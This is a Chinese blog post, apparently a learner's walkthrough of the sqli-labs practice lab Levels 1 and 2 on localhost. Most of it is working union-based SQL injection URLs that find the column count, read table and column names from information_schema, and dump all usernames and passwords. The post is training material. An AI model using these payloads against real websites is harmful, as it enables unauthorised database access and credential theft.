从零记录sqli-labs学习过程 Less-1&&Less-2

小张吃饭不用缸

已于 2022-03-23 19:17:19 修改

阅读量1.4k

点赞数

文章标签： sql web安全安全

于 2022-03-23 19:14:43 首次发布

本文链接：https://blog.csdn.net/fpxnb1/article/details/123693488

版权

sqli-labs Less-1&&Less-2

Less-1

在这里插入图片描述
参数为id，GET方式传递

在这里插入图片描述
简单测试一下初步判断为字符型注入

http://localhost/sqli-labs/Less-1/index.php?id=1 and 1=2 --+

http://localhost/sqli-labs/Less-1/index.php?id=1' and 1=2 --+

在这里插入图片描述

http://localhost/sqli-labs/Less-1/index.php?id=1' order by 3 --+

通过order by来判断字段数

order by 后面跟数字表示根据第几列的数据来排序，order by 4时报错也就是说字段数为3

在这里插入图片描述

http://localhost/sqli-labs/Less-1/index.php?id=-1' union select 1,2,3 --+

通过联合查询获得显示位，关于union select后面直接跟数字在SQL注入中的用法参考博客
https://blog.csdn.net/weixin_44840696/article/details/89166154
简单说就是要知道哪些字段会经过数据库查询后会回到前端，假如有3个字段id,username,password，以题目为例只返回username和password内容，id字段信息并不会返回到前端，当我们输入表中没有的字段时候，返回的列就会以我们输入的信息为名称，且内容也相同，行数和原有信息行数保持一致，所以我输入union select 1,200,300页面返回的就是200和300

在这里插入图片描述

http://localhost/sqli-labs/Less-1/index.php?id=-1' union select 1,(select database()),3 --+

获取当前数据库名称，把回显位置替换成SQL语句进行查询

在这里插入图片描述

http://localhost/sqli-labs/Less-1/index.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

查询当前数据库下的所有表

在这里插入图片描述

http://localhost/sqli-labs/Less-1/index.php?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

查询users表下的字段信息

在这里插入图片描述

http://localhost/sqli-labs/Less-1/index.php?id=-1' union select 1,group_concat(username),group_concat(password) from users --+

获取所有username和password信息

Less-2

在这里插入图片描述

http://localhost/sqli-labs/Less-2/index.php?id=1 and 1=1 --+

http://localhost/sqli-labs/Less-2/index.php?id=1 and 1=2 --+

判断出来为数字型注入，剩余步骤复刻Less-1走一遍就好了

小张吃饭不用缸

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫